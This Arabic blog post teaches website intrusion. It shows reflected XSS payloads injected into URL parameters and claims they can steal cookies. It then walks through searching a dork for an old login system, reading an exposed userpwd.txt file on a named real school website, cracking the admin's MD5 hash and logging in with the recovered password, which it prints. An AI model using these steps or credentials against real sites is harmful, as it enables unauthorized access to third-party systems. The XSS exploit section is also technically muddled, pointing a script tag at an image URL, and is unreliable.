تغريدات

شرح اختراق المواقع

السلام عليكم شرحنا اليوم هو اختراق المواقع عبر استغلال ثغرات 





ثغرة XSS

هي إختصار ل Cross-Site Scripting



وهي خطئ برمجي تصيب بعض  المواقع ال shoping والمواقع العامه  ويمكن استغلالها عبر حقن اكواد برمجيه بلغه جافا سكربت داخل المواقع ويمكن سحب الكوكز او الداتا عبرها .

ووضع حرف X لتمييزها عن لغة CSS

يأتي استغلالهاا عندما يسمح الموقع بتنفيذ بعض الاكواد باللغة Javascript


يتم استغلالها عبر طريقتين :

1 - إذا كان في الموقع مربع بحث ( عن طريقه )

2- عبر الحاق الكود برابط الموقع

مثال :

http://site.com/index.php?id=1

هذا رابط موقع ☝

* هذا هو الكود :

<script>alert('');</script>


* أحقن الكود على الشكل التالي :




http://site.com/index.php?id=<script>alert('Anonymous');</script>

النتيجة :

قم بإدخال الرابط بالمتصفح لديك وستنبثق لك نافذة مكتوب فيها Anonymous

هكذا يكون الموقع مصاب بثغرة XSS
وهذه نظرة عامة عن الثغرة .

*( exploit )*
مثال :

هذا رابط موقع  مصاب بثغرة XSS

http://site.com/index.php?id=1

ولدي صورة ملغمة برابط مباشر :

https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcRELxUYzv93a0QBItQc52bbxTFQX1zvePG7plSuK4J58uhlBEyM


نبدأ الإستغلال :

http://site.com/index.php?id=<script src="هنا اضع رابط الصورة"></script>

......

http://site.com/index.php?id=<script src=" https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcRELxUYzv93a0QBItQc52bbxTFQX1zvePG7plSuK4J58uhlBEyM"></script>

الناتج :
عند دخوله الرابط ستنبثق له نافة و OK وعند ضغطه على OK سيتحول مباشرة إلى المكان المطلوب وهوو رابط الصورة .


*( ثغرة )*

                                       ( userpwd )هي ثغرة

ولكن برأيي هي ليست ثغرة لانها قديمة جدا

هي عبارة عن لوحة دخول تجريبية للمواقع ، عبر البحث عنهم في هذا الدورك
 Micro login system v1.0

وأحيانا تجد مواقع تدخلك الى لوحة القيادة الرئيسية .

الإستغلال :

بعد بحثنا في الدورك ستظهر لنا مئات المواقع
يمكنك الضغط على اي موقع منهم ، ستجد انه قد ادخلك الى مكان دخول الآدمن

مثال الموقع التالي :

http://kingsbrookacademy.org/new/protect2/login.php

* نقوم بإستبدال ( login.php ) الى ( userpwd.txt )
يبقى الرابط كالتالي :

http://kingsbrookacademy.org/new/protect2/userpwd.txt

* ثم ندخل الرابط ... سنجد عدة هاشات ... ننسخ الهاش الذي بقرب كلمة admin

admin : f6fdffe48c908deb0f4c3bd36c032e72


* نقوم بفك الهاش إما عبر الأدوات وإما عبر مواقع
مثل موقع :

https://hashkiller.co.uk/Cracker/MD5

* الآن بعد فك الهاش وجدنا الباسورد
adminadmin

اصبح لدينا
username : admin
password : adminadmin

نعود لأول صفحة وجدناها ونسجل دخول
http://kingsbrookacademy.org/new/protect2/login.php

ومبروك عليكم الموقع .

Madjid DZ



بحث هذه المدونة الإلكترونية